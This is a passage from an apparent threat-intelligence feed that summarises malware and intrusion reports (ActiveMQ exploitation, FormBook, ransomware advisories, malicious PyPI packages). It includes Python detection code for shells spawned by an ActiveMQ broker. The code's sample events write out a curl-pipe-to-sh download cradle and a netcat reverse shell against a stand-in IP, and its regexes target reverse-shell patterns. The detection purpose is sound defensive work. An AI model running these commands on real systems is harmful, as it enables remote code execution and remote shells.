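if __name__ == "__main__":
    for host, tactics in correlate(SAMPLE_RECORDS).items():
        print(host, tactics)
```

With the default window only ws01 is flagged; widening the window to a week also surfaces srv02, which mirrors the slow tempo the report describes (compromise in October, bulk exfiltration in January), so the window is a tuning decision rather than a constant.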

RiskIQ - cyber risk firms (now microsoft) Beware of the Messengers, Exploiting ActiveMQ Vulnerability
#### Description
Cybereason Security Services has issued a Threat Analysis Report on an incident involving a Linux server on which malicious shell commands were executed from a Java process running Apache ActiveMQ. ActiveMQ is an open-source message broker used to bridge communications between separate servers running different components and/or written in different languages. The activity is strongly assessed to have leveraged the Remote Code Execution (RCE) vulnerability CVE-2023-46604. The observed shell executions include attempts to download additional payloads such as Mirai botnet binaries, HelloKitty ransomware, SparkRAT executables, and coinminers including XMRig. The deployment methods are mostly automated; however, one initial foothold depended on an interactive session via Netcat reverse shells. A shell or download utility spawned directly by the broker's Java process is the observable that matters here, since a message broker rarely has a legitimate reason to launch one.
> [Check out Microsoft's write-up on CVE-2023-46604 - Apache ActiveMQ here.](https://sip.security.microsoft.com/intel-profiles/CVE-2023-46604)
#### Reference URL(s)
1. https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability
#### Publication Date
March 13, 2024
#### Author(s)
Cybereason Security Services Team
2024-03-21T20:17:15+00:00 https://community.riskiq.com/article/9b8f807f www.secnews.physaphae.fr/article.php?IdArticle=8468115 False Ransomware,Vulnerability,Threat None 2.0000000000000000
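The following is an added example of detection logic for the observable the report describes, a shell or download utility spawned by the ActiveMQ broker's JVM; it is not code from Cybereason or RiskIQ. The process events are constructed to resemble Linux process-creation telemetry, and the field names, the list of suspect child executables and the command-line regexes (download cradle, `nc -e` reverse shell, bash `/dev/tcp` reverse shell) are assumptions to tune for a real environment. The lineage check runs first so that the same command line under a user's interactive shell is not reported.

```python
"""Flag shells and download utilities spawned by an ActiveMQ broker's JVM.

Added example, not code from the Cybereason report or the RiskIQ summary.
The events below are constructed to resemble Linux process-creation
telemetry (auditd/EDR style); the field names, the suspect-child list and
the regexes are assumptions to tune for your environment.
"""
import re
from dataclasses import dataclass

# Executables the broker's JVM should not normally spawn (assumption).
SUSPECT_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat",
                    "netcat", "python", "python3", "perl"}

# Command-line shapes of download cradles and reverse shells (constructed).
CMDLINE_PATTERNS = {
    "download_cradle": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "nc_exec_shell": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s*/bin/(ba)?sh\b"),
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    comm: str      # basename of the executable
    cmdline: str   # full command line
    user: str


@dataclass(frozen=True)
class Finding:
    pid: int
    parent_pid: int
    reason: str    # comma-separated indicator names
    cmdline: str


def is_activemq_broker(ev: ProcEvent) -> bool:
    """A JVM whose command line references ActiveMQ is treated as the broker."""
    return ev.comm == "java" and "activemq" in ev.cmdline.lower()


def cmdline_indicators(cmdline: str) -> list[str]:
    """Names of the CMDLINE_PATTERNS that match, in declaration order."""
    return [name for name, pat in CMDLINE_PATTERNS.items() if pat.search(cmdline)]


def find_broker_spawned_shells(events: list[ProcEvent]) -> list[Finding]:
    """Return a Finding for every event whose parent is the broker JVM and
    which is either a suspect executable or carries a suspicious command line."""
    by_pid = {ev.pid: ev for ev in events}
    findings = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None or not is_activemq_broker(parent):
            continue  # lineage check first: only children of the broker matter
        reasons = []
        if ev.comm in SUSPECT_CHILDREN:
            reasons.append(f"broker_jvm_spawned_{ev.comm}")
        reasons.extend(cmdline_indicators(ev.cmdline))
        if reasons:
            findings.append(Finding(ev.pid, parent.pid, ",".join(reasons), ev.cmdline))
    return findings


# Constructed sample telemetry: one ActiveMQ broker, one Tomcat JVM, one analyst shell.
SAMPLE_EVENTS = [
    ProcEvent(1200, 1, "java",
              "/usr/bin/java -Xms64M -jar /opt/activemq/bin/activemq.jar start",
              "activemq"),
    ProcEvent(1301, 1200, "sh",
              'sh -c "curl -s http://198.51.100.7/x.sh | sh"', "activemq"),
    ProcEvent(1302, 1200, "nc", "nc -e /bin/sh 198.51.100.7 4444", "activemq"),
    ProcEvent(2100, 1, "java", "/usr/bin/java -jar /opt/tomcat/bin/bootstrap.jar",
              "tomcat"),
    ProcEvent(2101, 2100, "sh", "sh -c ls /tmp", "tomcat"),        # not the broker
    ProcEvent(3000, 1, "bash", "-bash", "analyst"),
    ProcEvent(3001, 3000, "curl", "curl -s http://198.51.100.7/x.sh | sh", "analyst"),
]

if __name__ == "__main__":
    for f in find_broker_spawned_shells(SAMPLE_EVENTS):
        print(f"pid={f.pid} parent={f.parent_pid} [{f.reason}] {f.cmdline}")
```

Only the two children of pid 1200 are reported; the identical cradle under the analyst's bash and the Tomcat JVM's `sh -c ls` are ignored because the parent is not the broker, which keeps the rule quiet on hosts where administrators legitimately run curl.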

RiskIQ - cyber risk firms (now microsoft) FormBook Malware
#### Description
FormBook, an information stealer (infostealer) discovered in 2016, has capabilities such as logging keystrokes, accessing files, capturing screenshots, and stealing passwords from web browsers. It can execute additional malware as directed by a command-and-control server and is adept at evading detection through techniques like code obfuscation and encryption. FormBook's flexibility allows it to be customized for specific targets, and its obfuscation methods make removal challenging. Cybercriminals distribute FormBook through email attachments such as PDFs and Office documents, with notable use during the 2022 Russia-Ukraine conflict. FormBook's successor, XLoader, is currently active.
> [Check out Microsoft's write-up on information stealers here.](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6?)
#### Reference URL(s)
1. https://www.rewterz.com/rewterz-news/rewterz-threat-alert-formbook-malware-active-iocs-98
#### Publication Date
March 21, 2024
#### Author(s)
Rewterz
2024-03-21T19:45:35+00:00 https://community.riskiq.com/article/7b321c6c www.secnews.physaphae.fr/article.php?IdArticle=8468091 False Malware None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Infected Text Editors Load Backdoor into macOS
#### Description
Kaspersky researchers have discovered a new threat targeting Chinese users of one of the most popular search engines in China. The threat involves modified versions of popular text editors distributed through that search engine: in the first case the malicious resource appeared in the advertisement section, while in the second case it appeared at the top of the search results. The attackers used typosquatting and other techniques to make their resources look as similar as possible to the official websites of the programs.
#### Reference URL(s)
1. https://securelist.com/trojanized-text-editor-apps/112167/
#### Publication Date
March 13, 2024
#### Author(s)
Sergey Puzan
2024-03-20T20:05:33+00:00 https://community.riskiq.com/article/5a806c77 www.secnews.physaphae.fr/article.php?IdArticle=8467532 False Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT
#### Description
Perception Point's security researchers uncovered the PhantomBlu campaign targeting US-based organizations, deploying the NetSupport RAT through sophisticated evasion techniques and social engineering. The attackers used legitimate features of remote administration tools such as NetSupport Manager for malicious activities like surveillance, keylogging, file transfer, and system control. The campaign leveraged OLE template manipulation in Microsoft Office documents to hide and execute malicious code, evading traditional security systems. Through analysis of the phishing emails and payloads, the researchers identified the attackers' preference for reputable email delivery platforms and their intricate PowerShell dropper techniques.
The PhantomBlu operation represents an evolution in malware delivery strategies, blending advanced evasion methods with social engineering to compromise targeted organizations effectively.
#### Reference URL(s)
1. https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/
#### Publication Date
March 18, 2024
#### Author(s)
Ariel Davidpur
2024-03-19T21:16:06+00:00 https://community.riskiq.com/article/356f4d44 www.secnews.physaphae.fr/article.php?IdArticle=8466954 False Malware,Tool None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) FakeBat Delivered via Several Active Malvertising Campaigns
#### Description
Malwarebytes has reported that the number of search-based malvertising incidents almost doubled in February 2024. One malware family being tracked is FakeBat, which uses MSIX installers packaged with heavily obfuscated PowerShell code. The malvertiser distributing the malware was abusing URL shortener services but has now started to use legitimate websites that appear to have been compromised. The latest campaigns impersonate many different brands, including OneNote, Epic Games, Ginger, and the Braavos smart wallet application. Each downloaded file is an MSIX installer signed with a valid digital certificate, and once extracted, each installer contains more or less the same files with a particular PowerShell script. When the installer is run, this PowerShell script executes and connects to the attacker's command and control server. The threat actor is able to serve a conditional redirect to their own malicious site, and victims of interest are catalogued for further use. The full infection chain is summarized in the web traffic image in the article. The malware distributors are able to bypass Google's security checks and redirect victims to deceptive websites. Note that a valid code-signing signature on an MSIX package only establishes who signed it, not that its contents are benign.
#### Reference URL(s)
1.
https://www.malwarebytes.com/blog/threat-intelligence/2024/03/fakebat-delivered-via-several-active-malvertising-campaigns
#### Publication Date
March 12, 2024
#### Author(s)
Jérôme Segura
2024-03-19T19:15:33+00:00 https://community.riskiq.com/article/7cc81ecb www.secnews.physaphae.fr/article.php?IdArticle=8466898 False Malware,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Infostealer Disguised as Adobe Reader Installer
#### Description
AhnLab Security Intelligence Center (ASEC) recently discovered the distribution of an infostealer disguised as the Adobe Reader installer. The threat actor distributes the file as a PDF that prompts users to download and run the installer. The fake PDF is written in Portuguese, and its message tells the user that Adobe Reader is required to open the file and must be downloaded and installed, so the user fetches and installs the malware themselves.
#### Reference URL(s)
1. https://asec.ahnlab.com/en/62853/
#### Publication Date
March 11, 2024
#### Author(s)
ASEC
2024-03-18T15:42:59+00:00 https://community.riskiq.com/article/b2bef56a www.secnews.physaphae.fr/article.php?IdArticle=8466155 True Malware,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 18 March 2024
2024-03-18T13:23:03+00:00 https://community.riskiq.com/article/54f79303 www.secnews.physaphae.fr/article.php?IdArticle=8466085 False Ransomware,Spam,Malware,Tool,Threat,Prediction None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) BIPClip: Malicious PyPI Packages Target Crypto Wallet Recovery Passwords
#### Description
ReversingLabs has discovered a new campaign called BIPClip, which uses seven different open-source packages with 19 different versions on the Python Package Index (PyPI) to steal
mnemonic phrases used to recover lost or destroyed crypto wallets. The campaign targets developers working on projects related to generating and securing cryptocurrency wallets, particularly those looking to implement Bitcoin Improvement Proposal 39 (BIP39). The threat actors behind this campaign combined a variety of known and well-documented methods to achieve their goals while avoiding detection. First, they made their packages less suspicious by putting the malicious functionality into dependency packages rather than into the packages distributed directly to their targets, so that a reviewer reading only the top-level package sees nothing malicious. Second, the content of each of the discovered packages was carefully crafted to look benign. Finally, the threat actors focused only on what they wanted to steal, making no effort to leverage their access to gain full control over a compromised system or to move laterally within the compromised development organization.
#### Reference URL(s)
1. https://www.reversinglabs.com/blog/bipclip-malicious-pypi-packages-target-crypto-wallet-recovery-passwords
#### Publication Date
March 12, 2024
#### Author(s)
Karlo Zanki
2024-03-12T19:01:44+00:00 https://community.riskiq.com/article/21aa5484 www.secnews.physaphae.fr/article.php?IdArticle=8462816 False Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Distribution of MSIX Malware Disguised as Notion Installer
#### Description
A new MSIX malware disguised as the Notion installer is being distributed through a website that looks similar to the real Notion homepage. The file is a Windows app installer signed with a valid certificate. Upon running it, the user gets a pop-up, and after clicking the Install button, Notion is installed on the PC alongside the malware.
#### Reference URL(s)
1.
https://asec.ahnlab.com/en/62815/
#### Publication Date
March 10, 2024
#### Author(s)
Anh Ho, Facundo Muñoz, Marc-Etienne M.Léveillé
2024-03-11T20:06:53+00:00 https://community.riskiq.com/article/f21ac4ec www.secnews.physaphae.fr/article.php?IdArticle=8462305 False Malware None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 11 March 2024
2024-03-11T13:43:18+00:00 https://community.riskiq.com/article/0d210725 www.secnews.physaphae.fr/article.php?IdArticle=8462154 False Ransomware,Malware,Tool,Vulnerability,Threat,Prediction,Cloud None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Magnet Goblin Targets Publicly Facing Servers Using 1-Day Vulnerabilities
#### Description
Check Point reports that Magnet Goblin is a financially motivated threat actor that quickly adopts and leverages 1-day vulnerabilities in public-facing services as an initial infection vector. In at least one case, Ivanti Connect Secure VPN (CVE-2024-21887), the exploit entered the group's arsenal within a day of a proof of concept being published. The group has targeted Ivanti, Magento, Qlik Sense, and possibly Apache ActiveMQ. Analysis of the actor's recent Ivanti Connect Secure VPN campaign revealed a novel Linux version of a malware called NerbianRAT, in addition to WARPWIRE, a JavaScript credential stealer. The actor's arsenal also includes MiniNerbian, a small Linux backdoor, and remote monitoring and management (RMM) tools for Windows such as ScreenConnect and AnyDesk.
#### Reference URL(s)
1.
https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/
#### Publication Date
March 8, 2024
#### Author(s)
Check Point
2024-03-08T17:30:16+00:00 https://community.riskiq.com/article/11616c16 www.secnews.physaphae.fr/article.php?IdArticle=8460926 False Malware,Tool,Vulnerability,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Unveiling Earth Kapre aka RedCurl's Cyberespionage Tactics
#### Description
The Trend Micro MDR team investigated a recent incident and uncovered the intrusion sets employed by Earth Kapre. The espionage group Earth Kapre (aka RedCurl and Red Wolf) has been actively conducting phishing campaigns targeting organizations in Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the US. It uses phishing emails containing malicious disk-image attachments (.iso and .img), which lead to infection upon opening. This triggers the creation of a scheduled task for persistence, followed by the unauthorized collection and transmission of sensitive data to command-and-control (C&C) servers.
#### Reference URL(s)
1.
https://www.trendmicro.com/en_us/research/24/c/unveiling-earth-kapre-aka-redcurls-cyberespionage-tactics-with-t.html
#### Publication Date
March 7, 2024
#### Author(s)
Buddy Tancio, Maria Emreen Viray, Mohamed Fahmy
2024-03-07T21:48:42+00:00 https://community.riskiq.com/article/d2d46a48 www.secnews.physaphae.fr/article.php?IdArticle=8460528 False None None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Spinning YARN - A New Linux Malware Campaign Targets Docker, Apache Hadoop, Redis and Confluence
#### Description
Cado Security Labs researchers have recently encountered an emerging malware campaign targeting misconfigured servers running web-facing services. The campaign utilises a number of unique and previously unreported payloads, including four Golang binaries, that serve as tools to automate the discovery and infection of hosts running the above services. The attackers use these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an n-day vulnerability, to achieve Remote Code Execution (RCE) and infect new hosts. Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell and enable persistent access to the compromised hosts.
#### Reference URL(s)
1.
https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
#### Publication Date
March 6, 2024
#### Author(s)
Matt Muir
2024-03-06T21:12:22+00:00 https://community.riskiq.com/article/68797fe5 www.secnews.physaphae.fr/article.php?IdArticle=8460028 False Malware,Tool,Vulnerability,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) CryptoChameleon: New Phishing Tactics Exhibited in FCC-Targeted Attack
#### Description
Security researchers from Lookout recently uncovered a sophisticated phishing kit, known as CryptoChameleon, that uses novel techniques to steal sensitive data from users of cryptocurrency platforms and the Federal Communications Commission (FCC). The kit employs custom single sign-on (SSO) pages and phone/SMS lures to extract login credentials, multi-factor tokens, and photo IDs from victims, primarily on mobile devices. Notably, the kit includes an administrative console to monitor phishing attempts and offers customized redirections based on the victim's responses, with an emphasis on mimicking authentic MFA flows. One-time codes captured this way remain usable until they expire, so codes alone do not protect against a kit that collects them interactively. The attacks have successfully compromised hundreds of victims, primarily in the United States. While the tactics resemble those of previous actors such as [Scattered Spider AKA Octo Tempest](https://ti.defender.microsoft.com/intel-profiles/205381037ed05d275251862061dd923309ac9ecdc2a9951d7c344d890a61101a), infrastructure differences suggest a distinctly different threat group.
#### Reference URL(s)
1.
https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit
#### Publication Date
February 29, 2024
#### Author(s)
David Richardson, Savio Lau
2024-03-06T14:38:08+00:00 https://community.riskiq.com/article/9227be0c www.secnews.physaphae.fr/article.php?IdArticle=8459878 False Threat,Mobile None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Weekly OSINT Highlights, 4 March 2024
2024-03-06T01:05:06+00:00 https://community.riskiq.com/article/1fe95f7f www.secnews.physaphae.fr/article.php?IdArticle=8459610 False Ransomware,Spam,Malware,Tool,Threat,Legislation,Medical None 4.0000000000000000

RiskIQ - cyber risk firms (now microsoft) GhostSec's Joint Ransomware Operation and Evolution of their Arsenal
#### Description
Cisco Talos has observed a surge in the malicious activities of GhostSec, a financially motivated hacking group, over the past year. GhostSec has been conducting double extortion ransomware attacks on various business verticals in multiple countries, and its tooling has evolved with GhostLocker 2.0, a Golang variant of the GhostLocker ransomware. GhostSec and the Stormous ransomware group are conducting these attacks jointly and have started a new ransomware-as-a-service (RaaS) program, STMX_GhostLocker, which provides various options for their affiliates. Talos also discovered two new tools in GhostSec's arsenal, the "GhostSec Deep Scan tool" and "GhostPresser", both likely used in attacks against websites. GhostSec has remained active since last year and has conducted several denial-of-service (DoS) attacks that have taken down victims' websites.
#### Reference URL(s)
1.
https://blog.talosintelligence.com/ghostsec-ghostlocker2-ransomware/
#### Publication Date
March 5, 2024
#### Author(s)
Chetan Raghuprasad
2024-03-05T20:46:20+00:00 https://community.riskiq.com/article/ee5a4e56 www.secnews.physaphae.fr/article.php?IdArticle=8459509 False Ransomware,Tool None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Staying ahead of threat actors in the age of AI
2024-03-05T19:03:47+00:00 https://community.riskiq.com/article/ed40fbef www.secnews.physaphae.fr/article.php?IdArticle=8459485 False Ransomware,Malware,Tool,Vulnerability,Threat,Studies,Medical,Technical ChatGPT,APT 28,APT 4 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) New Wave of SocGholish Infections Impersonates WordPress Plugins
#### Description
A new wave of SocGholish malware infections has been identified targeting WordPress websites. The campaign leverages a JavaScript malware framework that has been in use since at least 2017. The malware attempts to trick unsuspecting users into downloading what is actually a Remote Access Trojan (RAT) onto their computers, which is often the first stage of a ransomware infection. The infected sites were compromised through hacked wp-admin administrator accounts.
#### Reference URL(s)
1.
https://blog.sucuri.net/2024/03/new-wave-of-socgholish-infections-impersonates-wordpress-plugins.html
#### Publication Date
March 1, 2024
#### Author(s)
Ben Martin
2024-03-04T20:21:51+00:00 https://community.riskiq.com/article/0218512b www.secnews.physaphae.fr/article.php?IdArticle=8459000 False Ransomware,Malware None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) Predator Spyware Operators Rebuild Multi-Tier Infrastructure to Target Mobile Devices
#### Description
Recorded Future's Insikt Group has discovered new infrastructure related to the operators of Predator, a mercenary mobile spyware. The infrastructure is believed to be in use in at least eleven countries, including Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago. Despite being marketed for counterterrorism and law enforcement, Predator is often used against civil society, targeting journalists, politicians, and activists. The use of spyware like Predator poses significant risks to privacy, legality, and physical safety, especially when used outside serious crime and counterterrorism contexts. Insikt Group's research identified a new multi-tiered Predator delivery infrastructure, with evidence from domain analysis and network intelligence data. Despite public disclosures in September 2023, Predator's operators have continued their operations with minimal changes. Predator, alongside NSO Group's Pegasus, remains a leading provider of mercenary spyware, with consistent tactics, techniques, and procedures over time. As the mercenary spyware market expands, the risks extend beyond civil society to anyone of interest to entities with access to these tools. Innovations in this field are likely to lead to more stealthy and comprehensive spyware capabilities.
#### Reference URL(s)
1. https://www.recordedfuture.com/predator-spyware-operators-rebuild-multi-tier-infrastructure-target-mobile-devices
#### Publication Date
March 1, 2024
#### Author(s)
Insikt Group
2024-03-01T20:49:50+00:00 https://community.riskiq.com/article/7287eb1b www.secnews.physaphae.fr/article.php?IdArticle=8457691 False Tool,Mobile,Technical None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) #StopRansomware: Phobos Ransomware
#### Description
Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. Phobos ransomware operates in conjunction with various widely available tools such as Smokeloader, Cobalt Strike, and Bloodhound. These tools are all easy to obtain and easy to use in various operating environments, making Phobos (and associated variants) a popular choice for many threat actors.
#### Reference URL(s)
1. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a
#### Publication Date
February 26, 2024
#### Author(s)
CISA
2024-02-29T20:16:44+00:00 https://community.riskiq.com/article/ad1bfcb4 www.secnews.physaphae.fr/article.php?IdArticle=8457173 False Ransomware,Tool,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft) #StopRansomware: ALPHV Blackcat
#### Description
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware-as-a-service (RaaS) identified through FBI investigations as recently as February 2024. This advisory provides updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released April 19, 2022, and to the version of this advisory released December 19, 2023.
ALPHV Blackcat actors have since employed improvised communication methods by creating victim-specific emails to notify of the initial compromise. Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized. This is likely in response to the ALPHV Blackcat administrator's post encouraging its affiliates to target hospitals after operational action against the group and its infrastructure in early December 2023. In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMware instances. ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations. According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities (nearly 75 percent of which are in the United States and approximately 250 outside the United States), demanded over $500 million, and received nearly $300 million in ransom payments.

#### Reference URL(s)
1. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a

#### Publication Date
December 19, 2023

#### Author(s)
CISA

2024-02-28T18:15:21+00:00 https://community.riskiq.com/article/b85e83eb www.secnews.physaphae.fr/article.php?IdArticle=8456579 False Ransomware None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Ransomware Roundup – Abyss Locker

#### Description
Despite being first submitted to a publicly available file scanning service in July 2023, the earliest variant of the Abyss Locker ransomware may have originated even earlier due to its foundation on the HelloKitty ransomware source code.
In early January 2024, researchers uncovered a version 1 variant targeting Windows systems, followed by a subsequent version 2 release later that month. The Abyss Locker threat actor adopts a strategy of exfiltrating victims' data before deploying the ransomware for file encryption, with additional capabilities including the deletion of Volume Shadow Copies and system backups. Additionally, a Linux variant of Abyss Locker has been observed, which employs different tactics such as targeting virtual machines and encrypting files with a ".crypt" extension.

#### Reference URL(s)
1. https://www.fortinet.com/blog/threat-research/ransomware-roundup-abyss-locker

#### Publication Date
February 26, 2024

#### Author(s)
Shunichi Imano, Fred Gutierrez

2024-02-27T22:38:36+00:00 https://community.riskiq.com/article/fc80abff www.secnews.physaphae.fr/article.php?IdArticle=8456118 False Ransomware,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

TimbreStealer Campaign Targets Mexican Users with Financial Lures

#### Description
Talos has observed a phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer Talos is calling TimbreStealer, which has been active since at least November 2023. It contains several embedded modules used for orchestration, decryption and protection of the malware binary. This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known as "Mispadu."

#### Reference URL(s)
1.
https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/

#### Publication Date
February 27, 2024

#### Author(s)
Guilherme Venere, Jacob Finn, Tucker Favreau, Jacob Stanfill, James Nutland

2024-02-27T20:31:31+00:00 https://community.riskiq.com/article/b61544ba www.secnews.physaphae.fr/article.php?IdArticle=8456070 False Spam,Malware,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Analysis of Nood RAT Used in Attacks Against Linux (Gh0st RAT's Variant)

#### Description
AhnLab Security Intelligence Center (ASEC) has discovered that Nood RAT, a variant of Gh0st RAT that works in Linux, is being used in malware attacks. Nood RAT is a backdoor malware that can receive commands from the C&C server to perform malicious activities such as downloading malicious files, stealing systems' internal files, and executing commands. Although simple in form, it is equipped with an encryption feature to avoid network packet detection. Nood RAT is developed using a builder that allows the threat actor to create an x86 or x64 binary based on the architecture and choose and use the binary that fits the target system. The malware has a feature that changes its name in order to disguise itself as a legitimate program. The threat actor is able to decide the malware's fake process name during the development stage.

#### Reference URL(s)
1.
https://asec.ahnlab.com/en/62144/

#### Publication Date
February 25, 2024

#### Author(s)
Sanseo

2024-02-26T20:46:17+00:00 https://community.riskiq.com/article/cc509147 www.secnews.physaphae.fr/article.php?IdArticle=8455566 False Malware,Threat None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Astaroth, Mekotio & Ousaban Abusing Google Cloud Run in LATAM-Focused Malware Campaigns

#### Description
Since September 2023, Cisco Talos has observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans. The infection chains associated with these malware families feature the use of malicious Microsoft Installers (MSIs) that function as droppers or downloaders for the final malware payload(s). The distribution campaigns for these malware families are related, with Astaroth and Mekotio being distributed under the same Google Cloud Project and Google Cloud storage bucket. Ousaban is also being dropped as part of the Astaroth infection process. The malware is being distributed via emails that use themes related to invoices or financial and tax documents, and sometimes pose as being sent from the local government tax agency in the country being targeted. The emails contain hyperlinks to Google Cloud Run, which can be identified by the use of run[.]app as the top-level domain (TLD). When victims access these hyperlinks, they are redirected to the Cloud Run web services deployed by the threat actors and delivered the components necessary to initiate the infection process.

#### Reference URL(s)
1.
https://blog.talosintelligence.com/google-cloud-run-abuse/

#### Publication Date
February 20, 2024

#### Author(s)
Edmund Brumaghin, Ashley Shen, Holger Unterbrink, Guilherme Venere

2024-02-23T20:51:22+00:00 https://community.riskiq.com/article/93dd0003 www.secnews.physaphae.fr/article.php?IdArticle=8454281 False Malware,Threat,Cloud None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

TinyTurla Next Generation

#### Description
Cisco Talos, in collaboration with CERT.NGO, has discovered new malicious components used by the Turla APT. Talos illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. They found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest. Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small "last chance" backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.

#### Reference URL(s)
1. https://blog.talosintelligence.com/tinyturla-next-generation/
2. https://blog.talosintelligence.com/tinyturla-ng-tooling-and-c2/

#### Publication Date
February 22, 2024

#### Author(s)
Asheer Malhotra, Holger Unterbrink, Arnaud Zobec, Vitor Ventura

2024-02-22T18:15:27+00:00 https://community.riskiq.com/article/35e2037c www.secnews.physaphae.fr/article.php?IdArticle=8453804 False None None 2.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

Alpha Ransomware Emerges from NetWalker Ashes

#### Description
Alpha, a new ransomware that first appeared in February 2023, has intensified its activities in recent weeks and strongly resembles the now defunct NetWalker ransomware that vanished in January 2021.
Analysis of Alpha reveals significant parallels with NetWalker, including the use of a similar PowerShell-based loader and code overlap. While Alpha initially remained low-profile after its appearance in February 2023, recent attacks indicate a surge in operations, including the deployment of a data leak site and the utilization of living-off-the-land tools like Taskkill and PsExec. The similarities between Alpha and NetWalker suggest a potential revival of the old ransomware operation by original developers or the acquisition and modification of the NetWalker payload by new attackers.

#### Reference URL(s)
1. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/alpha-netwalker-ransomware
2. https://gbhackers.com/alpha-ransomware-living-off-the-land/

#### Publication Date
February 16, 2024

#### Author(s)
Symantec Threat Hunter Team

2024-02-20T21:35:38+00:00 https://community.riskiq.com/article/507ee0d6 www.secnews.physaphae.fr/article.php?IdArticle=8452902 False Ransomware,Tool,Threat None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

SNS Sender | Active Campaigns Unleash Messaging Spam Through the Cloud

#### Description
SentinelOne researchers have discovered a new Python script called SNS Sender that uses AWS Simple Notification Service (SNS) to send bulk SMS messages for the purpose of spamming phishing links, also known as smishing. This is the first script observed using AWS SNS, and it is believed that the actor behind this tool is using cloud services to send bulk SMS phishing messages. The script author is known by the alias ARDUINO_DAS and is prolific in the phish kit scene. The script requires a list of phishing links named links.txt in its working directory.
SNS Sender also takes several arguments that are entered as input: a text file containing a list of AWS access keys, secrets, and region delimited by a colon; a text file containing a list of phone numbers to target; a sender ID, similar to a display name for a message; and the message content. The script replaces any occurrences of the string in the message content variable with a URL from the links.txt file, which weaponizes the message as a phishing SMS. The actor behind this tool has been linked to many phishing kits used to target victims' personally identifiable information (PII) and payment card details under the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery.

#### Reference URL(s)
1. https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/

#### Publication Date
February 15, 2024

#### Author(s)
Alex Delamotte

2024-02-16T20:41:12+00:00 https://community.riskiq.com/article/262fc193 www.secnews.physaphae.fr/article.php?IdArticle=8451105 False Spam,Tool,Cloud None 3.0000000000000000

RiskIQ - cyber risk firms (now microsoft)

